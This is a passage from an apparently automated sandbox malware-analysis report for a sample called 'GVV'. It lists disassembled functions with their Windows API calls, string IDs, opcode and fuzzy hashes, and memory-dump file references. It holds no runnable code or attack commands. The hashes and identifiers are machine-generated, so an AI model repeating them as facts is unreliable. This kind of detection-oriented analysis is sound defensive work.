                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                • API String ID: 55579361-631824599
                • Opcode ID: 71d3339f570b399d593c64636b0279d98c4871ee5a71da0efdb26edf24cde0f9
                • Instruction ID: a95cd0326c70873ba4b95072c12094c9cd846200fb2e45eb3956427efd5bd362
                • Opcode Fuzzy Hash: 71d3339f570b399d593c64636b0279d98c4871ee5a71da0efdb26edf24cde0f9
                • Instruction Fuzzy Hash: 7FE06D782003518BD3219FF8E518386BBE0AB19740F00492DE486C6A51DBB0E4858B91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0016D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: LocalTime
                • String ID: %.3d$X64
                • API String ID: 481472006-1077770165
                • Opcode ID: 4b6001dee6fc0636631c6eb04c58aa8163249f48a716bda0ce4d1c1aa515baad
                • Instruction ID: 8d7ff31791cf2aae8a1cf01336adced4443ff996f159adcf087b28af19be2571
                • Opcode Fuzzy Hash: 4b6001dee6fc0636631c6eb04c58aa8163249f48a716bda0ce4d1c1aa515baad
                • Instruction Fuzzy Hash: 58D012A1D09118E9CB9497E0FC559BAB37CBB18341F51846BF80691040E724C5686761
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                Download Yara Rule
                APIs
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001A232C
                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001A233F
                  • Part of subcall function 0017E97B: Sleep.KERNEL32 ref: 0017E9F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FindMessagePostSleepWindow
                • String ID: Shell_TrayWnd
                • API String ID: 529655941-2988720461
                • Opcode ID: bd02f07bf4a9dcfd1bfdc48d57eed5015b8fd11bfc2a86c0aea0c76674a14470
                • Instruction ID: 3c19417b5654183074b7a3f304f8f57c2eef925c9479e7c2442b610ba86ab132
                • Opcode Fuzzy Hash: bd02f07bf4a9dcfd1bfdc48d57eed5015b8fd11bfc2a86c0aea0c76674a14470
                • Instruction Fuzzy Hash: C2D012767D4310B7E664B770DC0FFC67A549B15B14F0089167759EA2D0CAF0A841CA94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 001A2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                Download Yara Rule
                APIs
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001A236C
                • PostMessageW.USER32(00000000), ref: 001A2373
                  • Part of subcall function 0017E97B: Sleep.KERNEL32 ref: 0017E9F3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: FindMessagePostSleepWindow
                • String ID: Shell_TrayWnd
                • API String ID: 529655941-2988720461
                • Opcode ID: 8ab4940d7308649fecc1dadbf7d158055f7256401de552c8cb5126a1a2ca83ca
                • Instruction ID: 511e1803387d0d8f26ddc83a58a80d4d4b680ae49308afc19f6c8d51fb2ba7e5
                • Opcode Fuzzy Hash: 8ab4940d7308649fecc1dadbf7d158055f7256401de552c8cb5126a1a2ca83ca
                • Instruction Fuzzy Hash: 4CD012727C13107BE664B770DC0FFC676549B16B14F0089167759EA2D0CAF0B841CA94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0014BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0014BE93
                • GetLastError.KERNEL32 ref: 0014BEA1
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0014BEFC
                Memory Dump Source
                • Source File: 00000000.00000002.3889730927.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                • Associated: 00000000.00000002.3889717556.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889783916.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889827683.00000000001DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3889842438.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_110000_GVV.jbxd
                Similarity
                • API ID: ByteCharMultiWide$ErrorLast
                • String ID:
                • API String ID: 1717984340-0
                • Opcode ID: 37c8b9c236f3f017b9e462db65ab687fed4566c6f867e4ebfdb41d6bbaa7ba0a
                • Instruction ID: 9a32e3c753c724264ec07c85e748bf7ca5173663cebe087c3eac9d657b5460e5
                • Opcode Fuzzy Hash: 37c8b9c236f3f017b9e462db65ab687fed4566c6f867e4ebfdb41d6bbaa7ba0a
                • Instruction Fuzzy Hash: 5941B434609206EFCF258F65CC94ABA7BA5EF42320F154169F95DA71B1DB30CD05DB60
                Uniqueness

                Uniqueness Score: -1.00%